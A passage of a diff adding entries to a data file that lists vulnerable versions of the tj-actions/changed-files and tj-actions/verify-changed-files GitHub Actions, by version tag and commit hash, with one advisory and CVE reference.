"b109d83a62e94cf7c522bf6c15cb25c175850b16", "41"] + - ["tj-actions/changed-files", "v35.7.12-sec", "2be7c3758f3e6e45ae5d27c133a3260c5b0fdd60", "41"] + - ["tj-actions/changed-files", "v35.7.11", "79adacd43ea069e57037edc891ea8d33013bc3da", "41"] + - ["tj-actions/changed-files", "v35.7.11-sec", "123dfd48407ae53e33a73e2ae9adf9d8ad8b14d6", "41"] + - ["tj-actions/changed-files", "v35.7.10", "6e426e6495fa7ea3451f37ce3f1dac2a3f16f62c", "41"] + - ["tj-actions/changed-files", 
"v35.7.10-sec", "61bf27253df806648581aaddd4a8ec394b968c80", "41"] + - ["tj-actions/changed-files", "v35.7.9", "5e2d64b30d51d557c5a29309ecbd5481a236ec77", "41"] + - ["tj-actions/changed-files", "v35.7.9-sec", "b94d96993dacb3158c51d22c3afae1f4059a71d2", "41"] + - ["tj-actions/changed-files", "v35.7.8", "e9b5807e928fc8eea705c90da5524fd44b183ba1", "41"] + - ["tj-actions/changed-files", "v35.7.8-sec", "22bed7e94fbb176468579214290dfd84abc6ea86", "41"] + - ["tj-actions/changed-files", "v35.7.7", "db5dd7c176cf59a19ef6561bf1936f059dee4b74", "41"] + - ["tj-actions/changed-files", "v35.7.7-sec", "7795905b24e743c8c33cd5ba5cd256cc92c81f68", "41"] + - ["tj-actions/changed-files", "v35.7.6", "07f86bcdc42639264ec561c7f175fea5f532b6ce", "41"] + - ["tj-actions/changed-files", "v35.7.6-sec", "08d9eb809753cbbaf6c8256285605312ce3987b9", "41"] + - ["tj-actions/changed-files", "v35.7.5", "3a3ec498d8976e74f5dd829c413c1d446e738df7", "41"] + - ["tj-actions/changed-files", "v35.7.4", "ee137444f0b3b0855cb2fc7df807416ba2c3d311", "41"] + - ["tj-actions/changed-files", "v35.7.3", "cda290230383045a8887a250c2abf796bf1dc6da", "41"] + - ["tj-actions/changed-files", "v35.7.2", "9328bab880abf4acc377d77718d28c6ac167f154", "41"] + - ["tj-actions/changed-files", "v35.7.1", "4e680e146a8e1b530a912f0a1fdc2f0ace7d1bb7", "41"] + - ["tj-actions/changed-files", "v35.7.1-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v35.7.0", "bd376fbcfae914347656e4c70801e2a3fafed05b", "41"] + - ["tj-actions/changed-files", "v35.7.0-sec", "1d1543af8cef13eb42c756e9425e2cc50e8030b0", "41"] + - ["tj-actions/changed-files", "v35.6.4", "84ed30e2f4daf616144de7e0c1db59d5b33025e3", "41"] + - ["tj-actions/changed-files", "v35.6.3", "74b06cafc9658d2a91cc5ceb920fd6b5a5649051", "41"] + - ["tj-actions/changed-files", "v35.6.2", "5ce975c6021a0b11062c547acb6c26c96a34a8c5", "41"] + - ["tj-actions/changed-files", "v35.6.1", "04124efe7560d15e11ea2ba96c0df2989f68f1f4", "41"] + - 
["tj-actions/changed-files", "v35.6.0", "3ee6abf6107ccc2d8ee538de7ff6b1fb644f5d60", "41"] + - ["tj-actions/changed-files", "v35.5.6", "23e3c4300cb904a9d9c36fc2df4111a2fa9b9ff1", "41"] + - ["tj-actions/changed-files", "v35.5.5", "5a331a4999f9f21a3ef2a6459edee90393a8b92a", "41"] + - ["tj-actions/changed-files", "v35.5.4", "74338865c1e73fee674ce5cfc5d28f4b9caa33bc", "41"] + - ["tj-actions/changed-files", "v35.5.3", "d5414fd30b0b7618c815fe7ebe5673720e081937", "41"] + - ["tj-actions/changed-files", "v35.5.2", "7f2aa19bdcf4a00195671e368091a1e32a694ac5", "41"] + - ["tj-actions/changed-files", "v35.5.1", "210cc839c24f532fe4fbf510b7b3314ca9a2b90b", "41"] + - ["tj-actions/changed-files", "v35.5.0", "db3ea27a0cf07135175be5efe7aaf84df6e0e6f0", "41"] + - ["tj-actions/changed-files", "v35.4.4", "57d9664f8e2aa45f26bcb59095f99aa47ae8e90d", "41"] + - ["tj-actions/changed-files", "v35.4.3", "0953088baa540166372190bec608cad1603a787d", "41"] + - ["tj-actions/changed-files", "v35.4.2", "0562b9f865df79542dfcd59cfbd14c9ac9a792d3", "41"] + - ["tj-actions/changed-files", "v35.4.1", "487675b843e203b5c9a92a07f1ed763d046d7283", "41"] + - ["tj-actions/changed-files", "v35.4.0", "9a6dabf8d15381f97f1c770257a1a0db59c28a47", "41"] + - ["tj-actions/changed-files", "v35.3.2", "7839ede089e483df865be448d6f3652f875005e0", "41"] + - ["tj-actions/changed-files", "v35.3.1", "c2296c1b044b4f5c97d310a6d31e95cbcb5583ec", "41"] + - ["tj-actions/changed-files", "v35.3.0", "ea251d4d2f03a9c18841ae1b752f58b82dfb4d5e", "41"] + - ["tj-actions/changed-files", "v35.2.1", "1d1287f9fafd92be283f99b781fb5f00f00dd471", "41"] + - ["tj-actions/changed-files", "v35.2.0", "392359fc8c85be1a8752e9ab6b1ad9e45158b4a9", "41"] + - ["tj-actions/changed-files", "v35.1.2", "7f33882a1271950f8592f96b77e694436bfee83b", "41"] + - ["tj-actions/changed-files", "v35.1.1", "1d8a2f91371fd14ec6146c37cbae79526144fbe9", "41"] + - ["tj-actions/changed-files", "v35.1.0", "0626c3f94002c0a9d7491dd7fed7055bbdff6f92", "41"] + - 
["tj-actions/changed-files", "v35.0.1", "a2b1e5dbb92d21753cf198228fbf2d0a8557f117", "41"] + - ["tj-actions/changed-files", "v35.0.0", "110b9baa5fc65597d65c1d019c6d3aee16d00c53", "41"] + - ["tj-actions/changed-files", "v35", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v34.6.2", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v34.6.1", "3b6c057cd82d1dafab565df2ba9fa489574a03b8", "41"] + - ["tj-actions/changed-files", "v34.6.0", "4f64429e8be26fe81a594635b07ed829581ea847", "41"] + - ["tj-actions/changed-files", "v34.5.4", "3f1e44af6ca48144748dfc62a7a6fb22e4ca67f3", "41"] + - ["tj-actions/changed-files", "v34.5.3", "74dc2e8a7877b725678a2195226bd470f10c481b", "41"] + - ["tj-actions/changed-files", "v34.5.2", "8356a01788b5a36aa0319e74183f3237e020feac", "41"] + - ["tj-actions/changed-files", "v34.5.1", "baaf598b46c2d9eb97eb995c9f69d1967349155d", "41"] + - ["tj-actions/changed-files", "v34.5.0", "8a4cc4fbd67975557b6d85dd302f5f9400b9c92e", "41"] + - ["tj-actions/changed-files", "v34.4.4", "8a7336fb6f6bc00da867b745d3491de42ac0231b", "41"] + - ["tj-actions/changed-files", "v34.4.3", "3996bc3fded83a011dbfc57f379fd31266770b3a", "41"] + - ["tj-actions/changed-files", "v34.4.2", "ef0a29048c50f844e30fac9fef80956f9765aab8", "41"] + - ["tj-actions/changed-files", "v34.4.1", "3ebdc42d8ba53fedc5bef0f16181249ac58446fa", "41"] + - ["tj-actions/changed-files", "v34.4.0", "94e6fba8d802f0fa80db51937e8752e9c165ee26", "41"] + - ["tj-actions/changed-files", "v34.3.4", "3dbb79f46716e706df6be563a268df44b264b545", "41"] + - ["tj-actions/changed-files", "v34.3.3", "991e8b3aae0ebbe0614b15b05d14ccb92affa24a", "41"] + - ["tj-actions/changed-files", "v34.3.2", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.1", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", 
"v34.3.0", "5f89dc7d6eefdcb7323e773671fd3461a7c2f050", "41"] + - ["tj-actions/changed-files", "v34.2.2", "734bb168e38279dfc7aa2af5d5be3a1475427a99", "41"] + - ["tj-actions/changed-files", "v34.2.1", "d2e030b6ed85ce2db7ac1a4afc574640df8bca26", "41"] + - ["tj-actions/changed-files", "v34.2.0", "6ba3c59bc6825f1ad375d92a9e70c6b275db0ddd", "41"] + - ["tj-actions/changed-files", "v34.1.1", "d0e44775cd5572bb0ead1d7d2e399015644f7359", "41"] + - ["tj-actions/changed-files", "v34.1.0", "b91acef304123e58fd6671ab267d6b5e2a7f2ef3", "41"] + - ["tj-actions/changed-files", "v34.0.5", "12633630aba2ab48ec2ad8a3344dd736d61a7b89", "41"] + - ["tj-actions/changed-files", "v34.0.4", "71840771e95943b1ab0c8f8ae45aeb0a34458e2e", "41"] + - ["tj-actions/changed-files", "v34.0.3", "cbfb0fda5afcfbf4ef0ef854bf0d8210abd0866f", "41"] + - ["tj-actions/changed-files", "v34.0.2", "932dad31974f07bd23cab5870d45c6e5ad5c8b73", "41"] + - ["tj-actions/changed-files", "v34.0.1", "9f289689bb8364780830da00b69507b88b5a2f07", "41"] + - ["tj-actions/changed-files", "v34.0.0", "c4d29bf5b2769a725bcc9a723c498ba9c34c05b4", "41"] + - ["tj-actions/changed-files", "v34", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v33.0.0", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v33", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v32.1.2", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v32.1.1", "8953e851a137075e59e84b5c15fbeb3617e82f15", "41"] + - ["tj-actions/changed-files", "v32.1.0", "8de562e9316b23c4473ad852e5fd4f7f2bac7bc8", "41"] + - ["tj-actions/changed-files", "v32.0.1", "7c640bd299646362775f9d02e156bc741f67453b", "41"] + - ["tj-actions/changed-files", "v32.0.0", "270645280afddc7e2cf3f4867089522c8f2f8f9a", "41"] + - ["tj-actions/changed-files", "v32", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v31.0.3", 
"dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v31.0.2", "528984a4f814905ea80ed2a3818afc97aef8b0de", "41"] + - ["tj-actions/changed-files", "v31.0.1", "75af1a47c484c669beec6a1d00fc9d1d78179725", "41"] + - ["tj-actions/changed-files", "v31.0.0", "5184a750a66da08aba414ca223aef75c055956a5", "41"] + - ["tj-actions/changed-files", "v31", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v30.0.0", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v30", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v29.0.9", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v29.0.8", "df4dacaa89cace34cd60d5e9580f041a041e5233", "41"] + - ["tj-actions/changed-files", "v29.0.7", "602081b5d9327a7770b4c447a4ee8984ae44e72e", "41"] + - ["tj-actions/changed-files", "v29.0.6", "6e12407521ea9b0d11a4b7ab09b40266bd39496a", "41"] + - ["tj-actions/changed-files", "v29.0.5", "c5c9b6ff9e75d84d8b69cbf82bcfbf61672ef91e", "41"] + - ["tj-actions/changed-files", "v29.0.4", "c41b7152594c4423f3787d26662239eb0ae027c0", "41"] + - ["tj-actions/changed-files", "v29.0.3", "60f4aabced9b4718c75acef86d42ffb631c4403a", "41"] + - ["tj-actions/changed-files", "v29.0.2", "82edb42dc4e3a5d5edf24cc3ae4b1f55c20cc220", "41"] + - ["tj-actions/changed-files", "v29.0.1", "18edda74753bbb7090ea030c1f80ef9610ebdff1", "41"] + - ["tj-actions/changed-files", "v29.0.0", "bec82ebb3493119ba317fcee8a0d1db09d39d1ac", "41"] + - ["tj-actions/changed-files", "v29", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v28.0.0", "28ac6724247a133793509b5d165d58319b40a171", "41"] + - ["tj-actions/changed-files", "v28", "602cf940579b9a2b2db0aafe835bfdb675fac12c", "41"] + - ["tj-actions/changed-files", "v27", "5e56dcabdd4a97ea745791856930038be56d9b70", "41"] + - ["tj-actions/changed-files", "v26.1", "58ae566dc69a926834e4798bcfe0436ff97c0599", 
"41"] + - ["tj-actions/changed-files", "v26", "7394701157dae4adb4eaa75d8c99e9b2edff81fe", "41"] + - ["tj-actions/changed-files", "v25", "36e65a11651994e93d6f1ef3afa781c3dcbb9780", "41"] + - ["tj-actions/changed-files", "v24.1", "bf6ddb7db66f9da5b2cffeb28b2b696aacb26e1c", "41"] + - ["tj-actions/changed-files", "v24", "6c44eb8294bb9c93d6118427f4ff8404b695e1d7", "41"] + - ["tj-actions/changed-files", "v23.2", "b2ee165d6b42ab1740e1037eb93748aad96767c5", "41"] + - ["tj-actions/changed-files", "v23.1", "34a865a2b221bd60ec0d4c071f5e7a66ffdac88a", "41"] + - ["tj-actions/changed-files", "v23", "fb1fe28aa9ff24afc553b37545437005a4cf2115", "41"] + - ["tj-actions/changed-files", "v22.2", "ae90a0b602c90d598c0c027a519493c1a069543e", "41"] + - ["tj-actions/changed-files", "v22.1", "bc1dc8f54db8eeeaae00ab92737ab34926b9ad8d", "41"] + - ["tj-actions/changed-files", "v22", "3de1f9a283b61f308ee3045be4d301037657225a", "41"] + - ["tj-actions/changed-files", "v21", "0edfedf16d9ff0903cbe599d474a022823ca8fb8", "41"] + - ["tj-actions/changed-files", "v20.2", "205450238e81d3da0e0ec2d776f58c12846fddfb", "41"] + - ["tj-actions/changed-files", "v20.1", "944a8b89098b24b0723ed9264888eb7fcffbbe9a", "41"] + - ["tj-actions/changed-files", "v20", "581eef0495dd5b75a3dd93047ff9f0d42dc09370", "41"] + - ["tj-actions/changed-files", "v19.3", "e55f7fb99e90111108bc24d3f14156b06ab6a12c", "41"] + - ["tj-actions/changed-files", "v19.2", "07b38ce1a17c46f1d0eb1150c8a33f703d473262", "41"] + - ["tj-actions/changed-files", "v19.1", "d26252004aa87df12f72411feec056907ecdbadc", "41"] + - ["tj-actions/changed-files", "v19", "a6d456f542692915c5289ea834fb89bc07c11208", "41"] + - ["tj-actions/changed-files", "v18.7", "a59f800cbb60ed483623848e31be67659a2940f8", "41"] + - ["tj-actions/changed-files", "v18.6", "a2f1692a6f703b7a14e155ae404e6bb15538b763", "41"] + - ["tj-actions/changed-files", "v18.5", "72aab29255d4fd553ccf1c0fa3223dcc62a2fd84", "41"] + - ["tj-actions/changed-files", "v18.4", 
"e35d0afdc1f0b01f84ec0f4cdf1b179325634b36", "41"] + - ["tj-actions/changed-files", "v18.3", "081ee9cc54a7ded6c421c632f23a31dbbe34a5f3", "41"] + - ["tj-actions/changed-files", "v18.2", "1f30bd2085b83668fb636f1a1f90744d8adbacca", "41"] + - ["tj-actions/changed-files", "v18.1", "227e314ad84036340cab47e649d91b012275a53c", "41"] + - ["tj-actions/changed-files", "v18", "ffd30e8dd820b89653c2298acf0447d29dbd0f16", "41"] + - ["tj-actions/changed-files", "v17.3", "f5a8de7d36c5909d300d7fcc8d6340d2a56ab9d9", "41"] + - ["tj-actions/changed-files", "v17.2", "0bc7d4006fb085334217ec5d6e6c288daade2f59", "41"] + - ["tj-actions/changed-files", "v17.1", "a53d74f700f2982646d538e66ce35cbfc8d4e826", "41"] + - ["tj-actions/changed-files", "v17", "933541631c41bad3fe20bdbd440ec68afa9a9518", "41"] + - ["tj-actions/changed-files", "v16", "4daffbaee17b34b8ae544990906277485819cc16", "41"] + - ["tj-actions/changed-files", "v15.1", "4b1f26aed507a21569666773e1c753dfe409d806", "41"] + - ["tj-actions/changed-files", "v15", "09441d38eaf8b76cbe2c42e256f46dfb432f63a4", "41"] + - ["tj-actions/changed-files", "v14.7", "e44053b6a0e8e7df1aa50a171c46601c605f61bb", "41"] + - ["tj-actions/changed-files", "v14.6", "c0dba8199070f01fcea9cd3a4dc42b365f06bf8d", "41"] + - ["tj-actions/changed-files", "v14.5", "fd2e9917c337ba7e2222d5aa9e32b27a57a71d14", "41"] + - ["tj-actions/changed-files", "v14.4", "2a8a501ad614cd775a2c07537b555783496dc085", "41"] + - ["tj-actions/changed-files", "v14.3", "a8ea7202c1c248d93235e87cc59e5b3a9881f558", "41"] + - ["tj-actions/changed-files", "v14.2", "88edda5361ed308226d6cb938eaa8b18182750f5", "41"] + - ["tj-actions/changed-files", "v14.1", "be68c10267c4979ed30c9397041b052b2980f91f", "41"] + - ["tj-actions/changed-files", "v14", "b59431bc7d44f9e8951a290fc7d48879f2ca1939", "41"] + - ["tj-actions/changed-files", "v13.2", "68bd279d40fb5bfc976429283b060c6ee426f63c", "41"] + - ["tj-actions/changed-files", "v13.1", "2c85495a7bb72f2734cb5181e29b2ee5e08e61f7", "41"] + - 
["tj-actions/changed-files", "v13", "f276697f3b86a1d897052524507c59f5e173ccd1", "41"] + - ["tj-actions/changed-files", "v12.2", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v12.1", "f56e736bedd192c12951db94e83a440885d04eb1", "41"] + - ["tj-actions/changed-files", "v12", "019a09d36e5b592a6770a9a71ef1b3efd9a85d37", "41"] + - ["tj-actions/changed-files", "v11.9", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v11.8", "b42f932be5b3fee4a990cb3e03478d5da2d4293b", "41"] + - ["tj-actions/changed-files", "v11.7", "8dfe0ee3f4840f84a7947b5288b19d7a583755ae", "41"] + - ["tj-actions/changed-files", "v11.6", "aae164d51be780a235cdeea89752bbacbbfee3c3", "41"] + - ["tj-actions/changed-files", "v11.5", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v11.4", "b54a7ae7259d0729d0b582bac28b05462f16cd64", "41"] + - ["tj-actions/changed-files", "v11.3", "902e60737927ccef3713faad3752d84f1153d7ac", "41"] + - ["tj-actions/changed-files", "v11.2", "2b51570d5f086eb07a1e527a182773b2045ec26b", "41"] + - ["tj-actions/changed-files", "v11.1", "040111b36775c1033b4703b77f9c5c203da18936", "41"] + - ["tj-actions/changed-files", "v11", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v10.1", "1d34e69895b85e643b9b259d54f395f0d1e27c10", "41"] + - ["tj-actions/changed-files", "v10", "b86b537e2b78397b630cfb1a8d0aec1e03379737", "41"] + - ["tj-actions/changed-files", "v9.3", "2a771ad30d623c27165b3677688ebe3f17c49f65", "41"] + - ["tj-actions/changed-files", "v9.2", "75933dc40b241db3752ed4c9e2f24cb7cfff51f9", "41"] + - ["tj-actions/changed-files", "v9.1", "2c0d12b627191145ce31c2a098d8d37e93b35861", "41"] + - ["tj-actions/changed-files", "v9", "7abdbc94e90b9a9b002ad86d8d2a5f9472c3c75c", "41"] + - ["tj-actions/changed-files", "v8.9", "675ab58887b9ae58d77d4dcd2d5e58228ab5f185", "41"] + - ["tj-actions/changed-files", "v8.8", "8c6f276ea5961fa51474aaa203c6d06226acbaa8", 
"41"] + - ["tj-actions/changed-files", "v8.7", "d825b1f7094e756ca34581aaab611003eaa23975", "41"] + - ["tj-actions/changed-files", "v8.6", "0bd70b7aecded5f2eb1f0498c3692433f2453b37", "41"] + - ["tj-actions/changed-files", "v8.5", "0fe67a1f15b48dcd40e7ea0dfdd4afc9418febf0", "41"] + - ["tj-actions/changed-files", "v8.4", "7bfa539f0d6ed4331d2899e7440a1946929829c1", "41"] + - ["tj-actions/changed-files", "v8.3", "d679de9200b28e963362cba99095dd8d9f23d446", "41"] + - ["tj-actions/changed-files", "v8.2", "1e10ed49507767257514a643ca1baab24a5496af", "41"] + - ["tj-actions/changed-files", "v8.1", "0754fdabe31b721683e1ffc719584df67ad24c87", "41"] + - ["tj-actions/changed-files", "v8", "d290bdd91e68dcf1bafe3fa63280666077cbc61c", "41"] + - ["tj-actions/changed-files", "v7", "15b1769fc52da64fe168a41ccb01c48b27687149", "41"] + - ["tj-actions/changed-files", "v6.3", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v6.2", "5fe8e4d60450bbe483ca011b747c4a972a79ef07", "41"] + - ["tj-actions/changed-files", "v6.1", "7c66aa285d3ec22f1b8442b9a498ebb76ca5f57b", "41"] + - ["tj-actions/changed-files", "v6", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v5.3", "e95bba87d2bd0b2bab4094abd9755a74f16703e6", "41"] + - ["tj-actions/changed-files", "v5.2", "7852058eeee10d857e59ce41f3cb465a70c96ae0", "41"] + - ["tj-actions/changed-files", "v5.1", "81f32e24026825ecfb7cb5d3951f91cfe788b0ad", "41"] + - ["tj-actions/changed-files", "v5.0.0", "450eadf5a0462f8d0b5e99d07d4b6d8f7358420c", "41"] + - ["tj-actions/changed-files", "v5", "0e956bb09e9b05df440a2459a041cdec3cc0cc0c", "41"] + - ["tj-actions/changed-files", "v4.4", "300e935beb285fcda513be84333e8726d5a544fb", "41"] + - ["tj-actions/changed-files", "v4.3", "fcb2ab8c32c2b66fdf94ab3deede353f8fe6f77c", "41"] + - ["tj-actions/changed-files", "v4.2", "271bbd60fedbc83dbb8cb00ce88bb4532d940e2f", "41"] + - ["tj-actions/changed-files", "v4.1", "e8ace0110cd60a2a0a729d52078ad6cec839dbb9", 
"41"] + - ["tj-actions/changed-files", "v4.0.7", "473984bd85c24f1fe61c0494d317cc7d490e1235", "41"] + - ["tj-actions/changed-files", "v4.0.6", "032f37fd241eeaf66ead8120552a3c6a157d1f22", "41"] + - ["tj-actions/changed-files", "v4.0.5", "3a35bdf667b36191faf1eea2b8c2cfbb8890bd25", "41"] + - ["tj-actions/changed-files", "v4.0.4", "c2216f65fdd828a28c41d6c97d242ec39ed694f3", "41"] + - ["tj-actions/changed-files", "v4.0.3", "0f16c26f3d5699a26be12446509c537ee964c1a8", "41"] + - ["tj-actions/changed-files", "v4.0.2", "271468ecafc0c12c5f0ce364317a640a5668eba7", "41"] + - ["tj-actions/changed-files", "v4.0.1", "fb063fc7d459d8ee25f9b3ed48ec83bc5c51df72", "41"] + - ["tj-actions/changed-files", "v4.0.0", "a05436ffa9505d25707f781260a99d01cebd0d13", "41"] + - ["tj-actions/changed-files", "v4", "c061ef1fa3d028267a34edff2d42a34c8d56ec53", "41"] + - ["tj-actions/changed-files", "v3.3", "489e2d514f3a230d66dbf74efec7ceed7b171703", "41"] + - ["tj-actions/changed-files", "v3.2", "8d5a33c6034b0991a3fe85b2e73012a689eadf92", "41"] + - ["tj-actions/changed-files", "v3.1", "fbfaba544e2ae235b2f88c936bcd5f8aa12419cc", "41"] + - ["tj-actions/changed-files", "v3.0.2", "1980f551b48196e1d8aa48fbfd924cedde0d3e13", "41"] + - ["tj-actions/changed-files", "v3.0.1", "a86b5608ded2e43fee87cbbde6394e0be7f46a41", "41"] + - ["tj-actions/changed-files", "v3.0.0", "f917cc3459f79321da6af2a153cb91ce82a34aaf", "41"] + - ["tj-actions/changed-files", "v3", "e18ccae8fe477263087493451ea812d4d36faa4e", "41"] + - ["tj-actions/changed-files", "v2.1", "e1d275d6d3255d6a586052675d3c5cef793edccf", "41"] + - ["tj-actions/changed-files", "v2.0.1", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v2.0.0", "9c1a181e67797cd053d15062eda07b2b322bbbfe", "41"] + - ["tj-actions/changed-files", "v2", "5eaa2d80dddfe7de6f7cc75fcaeb554851737685", "41"] + - ["tj-actions/changed-files", "v1.3.1", "188487d180e816622215bd011cbaca666af41ed9", "41"] + - ["tj-actions/changed-files", "v1.3.0", 
"30988915fa46789ba51cc1436c92488a52ac44ee", "41"] + - ["tj-actions/changed-files", "v1.2.2", "467d26c8b77612d9f7d20df5271edc207eae69a7", "41"] + - ["tj-actions/changed-files", "v1.2.1", "d9eb683b30e5b231c948331ad364b991fa8be544", "41"] + - ["tj-actions/changed-files", "v1.2.0", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v1.1.3", "8e7cc77ab9c1bffc233f2f3023d1b89ed44c9af5", "41"] + - ["tj-actions/changed-files", "v1.1.2", "81ad4b874479c31a00285815995079e20c6c2779", "41"] + - ["tj-actions/changed-files", "v1.1.1", "5e2a2f192377df7d67537b0e788e1b53e8a76f12", "41"] + - ["tj-actions/changed-files", "v1.1.0", "1af9ab38306a2fa478c9772eabab167444dbc755", "41"] + - ["tj-actions/changed-files", "v1.0.3", "55a857d66a8e01f50a2a37d18239edde79b1668d", "41"] + - ["tj-actions/changed-files", "v1.0.2", "62a9200adfe8200623dcd28ca74973e82baa954c", "41"] + - ["tj-actions/changed-files", "v1.0.1", "b915d091052b9d35e7c200d1da10cc6e2ec266e2", "41"] + - ["tj-actions/changed-files", "v1.0.0", "f0751de6af436d4e79016e2041cf6400e0833653", "41"] + - ["tj-actions/changed-files", "v1", "eef94236f6b9dec768f89dc72b9e0b64e13bb36e", "41"] + + # tj-actions/verify-changed-files + # https://github.com/advisories/GHSA-ghm2-rq8q-wrhc + # CVE-2023-52137 + - ["tj-actions/verify-changed-files", "v16.1.1", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v16.1.0", "a9b6fd340565065ad293625200630be7fd2b0f13", "17"] + - ["tj-actions/verify-changed-files", "v16.0.1", "30aa174f53f67ecd5dc8e190dfbe46392202e5a5", "17"] + - ["tj-actions/verify-changed-files", "v16.0.0", "7f1b21ceb7ef533b97b46e89e2f882ee5cb17ae0", "17"] + - ["tj-actions/verify-changed-files", "v16", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v15.0.2", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v15.0.1", "7da22d0521c254e711e5988bd2c7d48c2948d137", "17"] + - 
["tj-actions/verify-changed-files", "v15.0.0", "7016858e130743cc6c6b472849411d40aa8ae1ce", "17"] + - ["tj-actions/verify-changed-files", "v15", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v14.0.2", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v14.0.1", "bad2f5d7fc7e6812ac48d7e7207025a5a4cc93d3", "17"] + - ["tj-actions/verify-changed-files", "v14.0.0", "3b573ace62e287c3d68e24e4de2ee0c6f6280d86", "17"] + - ["tj-actions/verify-changed-files", "v14", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v13.2.0", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v13.1", "9ed3155b72ba709881c967f75611fc5852f773b9", "17"] + - ["tj-actions/verify-changed-files", "v13", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v12.0", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v12", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v11.1", "1d7ee9711b0a8f675208004e66bc25d593a1a0ae", "17"] + - ["tj-actions/verify-changed-files", "v11", "c4322970b4f055ede155b95586b04562796f83b7", "17"] + - ["tj-actions/verify-changed-files", "v10.1", "6e986dfff1f61105bc496287b5bbf0776092737e", "17"] + - ["tj-actions/verify-changed-files", "v10", "fa6ea307b32e5314d4a62b1209c3c782d5b5dcc9", "17"] + - ["tj-actions/verify-changed-files", "v9.2", "6f40ee1d523d9a9223204ae06919a3b2739702dc", "17"] + - ["tj-actions/verify-changed-files", "v9.1", "1b13d2556290c5ca5a94b7d042b91f3519c17d38", "17"] + - ["tj-actions/verify-changed-files", "v9", "c09bcad97929b17bacf737670bee312af98be94f", "17"] + - ["tj-actions/verify-changed-files", "v8.8", "fda469d6b456070da68fa3fdbc07a513d858b200", "17"] + - ["tj-actions/verify-changed-files", "v8.7", "bd1e271a8d26e249e0412899d4e3d8f5a89ecd6c", "17"] + - 
["tj-actions/verify-changed-files", "v8.6", "367ba21c800e2a2b1451e272d24cf0caa3e4f9e4", "17"] + - ["tj-actions/verify-changed-files", "v8.5", "9dea97ec0f35d708d32dadd9b34a6af7cc28b19f", "17"] + - ["tj-actions/verify-changed-files", "v8.4", "c154cc6a77695d4483937745499e07fee62addd3", "17"] + - ["tj-actions/verify-changed-files", "v8.3", "527ff7533afca6e5bece96bd15a998f90f54c624", "17"] + - ["tj-actions/verify-changed-files", "v8.2", "e8756d59f6d66ad7376c293832e4d6eda8ae3257", "17"] + - ["tj-actions/verify-changed-files", "v8.1", "bcb4e766c132157cda3d1e8c7ca3d68d86d6ae6b", "17"] + - ["tj-actions/verify-changed-files", "v8", "25267f57f3afa6c59f1495e52da8b08c2c586606", "17"] + - ["tj-actions/verify-changed-files", "v7.2", "ea24bfd8ba4b019cb321502a4382a7a44b6ebc01", "17"] + - ["tj-actions/verify-changed-files", "v7.1", "f2a40baded88e47fa3f8e0f614832835194f4904", "17"] + - ["tj-actions/verify-changed-files", "v7", "197e12135dd5eaedd520a27882d17c1f384cf6a0", "17"] + - ["tj-actions/verify-changed-files", "v6.2", "a8f1b11a7c4dfc6706d8c64416dda0ef85d06e77", "17"] + - ["tj-actions/verify-changed-files", "v6.1", "95c26dda77430743cb3542d24b3e739417f5a881", "17"] + - ["tj-actions/verify-changed-files", "v6", "97ba4ccf1285bdfca165bc0b0a7cb1f994dae04e", "17"] + - ["tj-actions/verify-changed-files", "v5.7", "68310bb8f2a087df9f6ab1a2cc07c1e7cfc8ea28", "17"] + - ["tj-actions/verify-changed-files", "v5.6", "720ba6a5776e8687117603acab16000c0fc8868b", "17"] + - 